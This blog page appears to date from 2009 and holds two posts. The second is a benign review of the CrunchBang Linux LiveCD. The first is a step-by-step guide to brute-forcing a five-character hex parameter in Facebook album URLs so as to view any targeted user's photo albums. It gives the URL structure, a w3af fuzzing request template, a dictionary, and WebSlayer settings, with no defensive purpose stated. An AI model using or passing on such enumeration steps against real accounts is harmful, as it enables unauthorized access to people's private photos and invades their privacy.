Facebook Hack - Access Any Users Photo Albums

Featured 27 Responses »
Mar 122009

http://www.flickr.com/photos/noneck/

Dave from Security Ninja shows how you can easily bruteforce a certain parameter to allow access to any user’s Facebook photo album using Burp Suite. Here are the basics:

Access to albums in Facebook is controlled by three parameters of a URL, you can see them here:

http://www.facebook.com/album.php?aid=-3&id=1508034566&l=aad9c

aid=-3 (-3 for every public profile album)
id=0123456789 (Obtained by searching for the user and hovering over the add friend button)
l=? (all we know is its 5 characters from the 0123456789abcdef range)

Dave uses Burp Suite, but there are many ways you can go about it. I think a dictionary of possible values might be marginally faster (untested) so I’ll use that.

First is one of my favorite methods, w3af’s Fuzzy Requests and Clustered Response tools.

GET http://www.facebook.com/album.php?aid=-3&id=targetsid&l=$[l.strip() for l in file('fbhex.dic').readlines()]$ HTTP/1.0
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/312.1 (KHTML, like Gecko) Safari/312
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded

Here’s the dictionary (1.1MB, zipped), extract it to your w3af directory.

After the run is finished, run the Cluster tool and wait. The valid page should show up far away from the rest of them.

Another tool that could be used for this is Edge Security’s WebSlayer:
URL:
http://www.facebook.com/album.php?aid=-3&id=targetsid&l=FUZZ
Set it to ignore lines so you can find your valid request faster. Currently, the error page contains 71 lines, but this may be different for you. Just run the scan for a few seconds and look at the number of lines that each error page contains, then stop the scan, enter the number in the ignore lines box and start again.

webslayer

Other useful features of WebSlayer are the ability to control the rate and set proxy options.

There are likely MANY other tools that you can use to accomplish this task, but these seem to be the simplest.
Good luck, and remember:

Check out Dave’s post for the Burp Suite method he uses to generate the needed parameter.

Posted by nukeit at 3:52 pm Tagged with: , , , , , , , , , , , , ,

CrunchBang Linux Lite LiveCD

Featured 1 Response »
Jan 222009

crunchbang-irssi

Looks like I found my new favorite LiveCD. Now normally I only review security distros here, but I have to make an exception for CrunchBang. It is quite possibly the best Ubuntu hack I’ve seen since Mint.

[Gentoo users can stop reading now]

The balance of performance, stability, usability and overall “leetness” of CrunchBang is unparalleled by any currently active distribution. Now mind you, I tend to toss those words around for any distro that has the words Openbox and Debian/Ubuntu in its description. Speaking of which… :)

Description:

CrunchBang Linux is an Ubuntu based distribution featuring the lightweight Openbox window manager and GTK+ applications. The distribution has been built and customized from a minimal Ubuntu install. The distribution has been designed to offer a good balance of speed and functionality.

CrunchBang Lite comes with these core applications:

Run Program → gmrun
Terminal → Terminator Terminal Emulator
Web Browser → Firefox 3 web browser
File Manager → PCMan File Manager
Media Player → VLC media player
Text Editor → Leafpad

And the following terminal applications:

Vim editor
Midnight Commander file manager
rtorrent BitTorrent Client
MOC music player
Newsbeuter feed reader
elinks web browser
MUTT email client
irssi IRC client
naim chat client
htop system monitor

Screenshots (in no particular order, thanks to WordPress):

Gripes:
You’ll notice a screenshot of the autostart file, which seemed to be the only place to get rid of the default UK keyboard layout. Unfortunately, 5am Linuxing prevented me from being able to figure out how to make the settings stick…

CrunchBang Linux is also available in Standard and Eee PC editions.

Home
About
Download

Posted by nukeit at 6:15 am Tagged with: , , , , , , , , , , , , , , , , , , ,
© 2010 nukeitdotorg Suffusion WordPress theme by Sayontan Sinha